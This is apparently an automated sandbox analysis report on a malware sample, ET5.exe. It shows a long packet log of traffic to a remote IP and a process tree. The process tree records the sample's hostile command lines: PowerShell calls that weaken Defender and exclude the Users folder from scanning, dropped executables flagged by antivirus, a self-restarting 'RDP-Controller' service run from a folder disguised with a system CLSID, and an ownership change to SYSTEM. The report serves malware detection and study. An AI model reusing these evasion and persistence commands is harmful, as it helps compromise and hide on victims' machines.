                  Dec 6, 2024 14:19:47.487478971 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.487606049 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.487744093 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.488464117 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.488574982 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.489425898 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.489509106 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.489569902 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.490428925 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.490540981 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.490552902 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.490670919 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.491426945 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.491540909 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.491637945 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.492464066 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.492532015 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.492818117 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.493396997 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.493522882 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.494577885 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.494688034 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.494707108 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.494791985 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.495609045 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.495708942 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.495799065 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.496499062 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.496581078 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.497349024 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.497526884 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.497529030 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.497828960 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.498382092 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.498548985 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.498724937 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.499341011 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.499425888 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.499666929 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.500334978 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.500471115 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.501312017 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.501434088 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.501445055 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.501509905 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.502331018 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.502440929 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.503304958 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.503417969 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.503433943 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.503523111 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.504280090 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.504409075 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.504816055 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.505270004 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.505321026 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.505393028 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.506305933 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.506413937 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.506525993 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.507265091 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.507417917 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.507683992 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.508249998 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.508338928 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.508497953 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.530436993 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.530548096 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.530622959 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.530884027 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.531069040 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.531146049 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.531852961 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.532239914 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.532301903 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.532362938 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.652111053 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.652182102 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.652213097 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.652628899 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.652695894 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.652826071 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.653640985 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.653655052 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.653707981 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.654597044 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.654678106 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.654747009 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.655782938 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.655977011 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.656008959 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.656820059 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.656884909 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.656905890 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.657540083 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.657661915 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.657663107 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.658531904 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.658654928 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.658665895 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.659522057 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.659672022 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.659821033 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.660506010 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.660608053 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.660835981 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.661559105 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.661674976 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.661709070 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.662491083 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.662597895 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.662620068 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.663470030 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.663590908 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.663624048 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.664472103 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.664616108 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.664733887 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.665452957 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.665580034 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.665611982 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.666419983 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.666579962 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.666609049 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.667469025 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.667531013 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.667583942 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.668447018 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.668548107 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.668567896 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.669563055 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.669653893 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.669661999 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.670468092 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.670555115 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.670579910 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.671394110 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.671453953 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.671458006 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.672370911 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.672461033 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.672518969 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.673377991 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.673454046 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.673507929 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.674374104 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.674478054 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.674513102 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.675368071 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.675487041 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.675720930 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.676345110 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.676407099 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.676441908 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.677350044 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.677450895 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.677467108 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.678329945 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.678390980 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.678411007 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.679296970 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.679354906 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.679469109 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.680304050 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.680389881 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.680474997 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.681294918 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.681354046 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.681416988 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.682276964 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.682363033 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.682390928 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.683329105 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.683403969 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.683434963 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.684248924 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.684334040 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.684372902 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.685255051 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.685350895 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.685379982 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.686249018 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.686332941 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.686362982 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.687226057 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.687318087 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.687386036 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.688232899 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.688353062 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.688457012 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.689198017 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.689301014 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.689508915 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.690200090 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.690257072 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.690288067 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.691215038 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.691304922 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.691319942 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.692177057 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.692272902 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.692292929 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.693159103 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.693304062 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.693419933 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.694165945 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.694287062 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.694317102 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.695168972 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.695286036 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.695451021 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.696235895 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.696321011 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.696400881 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.697221041 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.697354078 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.697365046 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.698221922 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.698296070 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.698599100 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.699178934 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.699266911 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.699331999 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.700102091 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.700170040 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.700201035 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.722444057 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.722572088 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.722615004 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.722893953 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.723061085 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.723092079 CET497041128192.168.2.545.202.33.26

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:08:19:33
                  Start date:06/12/2024
                  Path:C:\Users\user\Desktop\ET5.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\ET5.exe"
                  Imagebase:0x400000
                  File size:17'157'120 bytes
                  MD5 hash:98C7EC9EB9C760E176A78A01BCB9F91C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:08:19:34
                  Start date:06/12/2024
                  Path:C:\Users\user\Desktop\ET5.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\Desktop\ET5.exe
                  Imagebase:0x400000
                  File size:17'157'120 bytes
                  MD5 hash:98C7EC9EB9C760E176A78A01BCB9F91C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:3
                  Start time:08:19:39
                  Start date:06/12/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"
                  Imagebase:0x7ff6cb300000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:08:19:39
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:08:19:39
                  Start date:06/12/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:08:19:42
                  Start date:06/12/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:08:19:45
                  Start date:06/12/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:08:20:00
                  Start date:06/12/2024
                  Path:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe"
                  Imagebase:0x7ff6ff590000
                  File size:10'669'056 bytes
                  MD5 hash:2F829F1CB631D234C54F2E6C6F72EB57
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:11
                  Start time:08:20:01
                  Start date:06/12/2024
                  Path:C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe"
                  Imagebase:0x7ff704890000
                  File size:98'304 bytes
                  MD5 hash:319865D78CC8DF6270E27521B8182BFF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 67%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:12
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\taskkill.exe
                  Wow64 process (32bit):false
                  Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                  Imagebase:0x7ff657bd0000
                  File size:101'376 bytes
                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:13
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:14
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe stop RDP-Controller
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:15
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:16
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:17
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:18
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:19
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:20
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe start RDP-Controller
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:21
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:22
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  Imagebase:0x7ff708870000
                  File size:89'088 bytes
                  MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  General

                  Target ID:23
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\icacls.exe
                  Wow64 process (32bit):false
                  Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                  Imagebase:0x7ff633a60000
                  File size:39'424 bytes
                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                  Has elevated privileges:true
                  Has administrator privileges:true
